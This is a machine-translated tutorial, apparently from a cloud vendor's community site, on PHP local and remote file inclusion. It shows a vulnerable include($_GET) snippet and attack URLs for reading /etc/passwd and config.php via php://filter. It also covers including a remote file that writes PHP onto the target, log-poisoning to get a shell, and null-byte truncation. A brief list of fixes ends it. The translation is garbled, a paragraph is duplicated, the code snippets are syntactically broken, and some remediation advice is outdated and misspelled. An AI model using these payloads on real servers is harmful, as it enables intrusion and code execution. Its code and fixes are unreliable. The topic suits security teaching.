Analysis of File inclusion vulnerabilities

Source: Internet
Author: User
Tags apache log file base64 phpinfo apache log
0x00 file contains concepts and classifications

Program developers typically write functions to be reused in a single file, calling this function directly in a file when using a function without having to write again.


The file contains two types:
Local file contains
The remote file contains: The remote file is loaded, and the Allow_url_include, Allow_url_fopen option is opened in php.ini.  You can execute arbitrary code directly after opening. The file contains two types:
Local file contains
The remote file contains: The remote file is loaded, and the Allow_url_include, Allow_url_fopen option is opened in php.ini. You can execute arbitrary code directly after opening.

The cause of 0x01 loophole

Program developers usually set the included files into variables for flexibility, and then invoke these files dynamically. But it is precisely because of the flexibility of the invocation that the user may invoke some malicious files, causing the file to contain vulnerabilities.



0x02 PHP file contains functions
Include ()

With this function, the file is included only when the code executes to this function, and only if an error occurs and continues execution.


Inclue_once ()

Functionality is the same as the former, except that when the same file is called repeatedly, the program is called only once.


Require ()

Use this function to call this function to include a file as soon as the program executes, and an error message is printed and the program is terminated immediately.


Require_once ()
Functionality is the same as the former, except that when the same file is called repeatedly, the program is called only once.


0X03 Vulnerability code Example

<?php
if ($_get[' test ']) {
	include ($_get[' test '));
} else{
	include (index.php);
>
<span style= "font-family:arial, Helvetica, Sans-serif;" ><span style= "FONT-SIZE:18PX;" > Normal URL Access:http://www.test.com/index.php?test=xxx.php</span></span>
<span style= "FONT-SIZE:18PX;" > Access URLs will contain xxx.php, but because xxx.php does not exist, there will be errors in the inclusion, and it is very likely to burst the absolute path of the site </span>
This is just a simple test, and it is entirely possible for an attacker to change the value of the test parameter and execute some malicious code to achieve the effect of the attack.



0x04 PHP file contains the use of
Read sensitive files
Access: HTTP://WWW.TEST.COM/INDEX.PHP?TEST=/ETC/PASSWD, if the target host exists the file and has read permissions, the file contents can be read.

Remote include shell
Used the remote file contains. Make sure the target host has the Allow_url_fopen option open, and write the test code in the remote file http://www.test1.com/test.txt.
<?php fputs (fopen ("text.php", "w"), "<?php phpinfo ();?>")?>

Access: Http://www.test.com/index.php?test=http://www.test1.com/test.txt, the text.php file will be generated in the root directory of the Web site, which reads: "<?php Phpinfo ();?> "


Picture upload and include picture SHENLL
Using the same method as above, only this time is local included, directly in the upload of the picture to write test code and access to the image address can be.


Using pseudo protocol
Read PHP file: Access http://www.test.com/index.php?test=php://filter/read=convert.base64-encode/resource= config.php, you will get a string that has been encrypted after Base64. After the tool is decrypted, you can see the original content.


Include log file Getshell
Condition: Know where the log file access.log is stored
Find Method:
Now that a file contains a vulnerability, it is possible to use the vulnerability to read the Apache configuration file to find the location of the log file.
Default location:/var/log/httpd/access_log
Use:
Typically after Apache is run, two log files Access.log and Error.log,access.log files are generated by default to record information about each request from the client. The Access.log file still records this resource information when we access a resource that does not exist.

If the target site has a file containing a vulnerability, but there is no file to include, we can try to access http://www.test.com/<?php phpinfo (); Apache will record this information in the Access.log file, and if we access the Access.log file, it will trigger the file to contain the vulnerability. This is theoretically the case, but actually the input code is escaped and cannot be resolved. Is this the end of it? No, no, no, the attacker can burpsuite this artifact for grabs. In the HTTP request package, the escaped code can be bypassed by changing it to normal test code. Then look at the Apache log file, showing the normal test code.
At this point access: http://test.com/index.php?test= log file path, you can successfully execute the test code.

Truncate contains
Vulnerability Code:

<?php
if (isset ($_get[' test ')) {
include ($_get[' test '). ". PHP ");
 } else{
include (index.php);
 >
This does fix the vulnerability to some extent, but the attacker can still use the truncation technique to bypass it.
Normal upload picture a sentence and access: Http://test.com/index.php?test=1.jpg will be wrong, because contains the file does not exist 1.jpg.php this article

Thing However, if you enter a http://test.com/index.php?test=1.jpg%00, you will most likely bypass detection. This approach applies only to PHP.ini Magic_quotes_qpc=off and PHP version less than 5.3.4. If the on,%00 is escaped, it cannot be truncated.

There is also a way to truncate the path length, but it is now rarely seen. Applies to PHP version at least less than 5.2.8 (unsure not to try).
Example: Http://test.com/index.php?test=1.jpg../../../../../../..., (Windows needs to be longer than 256 bytes, Linux needs to be longer than 4,096 bytes)



0x05 Repair Scheme
Prevent remote files from containing Allow_url_include=off
Configure open_basedir= Specify the directory to restrict access to the zone.
Filter.. /Other Special symbols
Modify the location of Apache log files
Open Magic Quotes Magic_quotes_qpc=on
Try not to use dynamic variables to call the file and write directly to the file you want to include.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.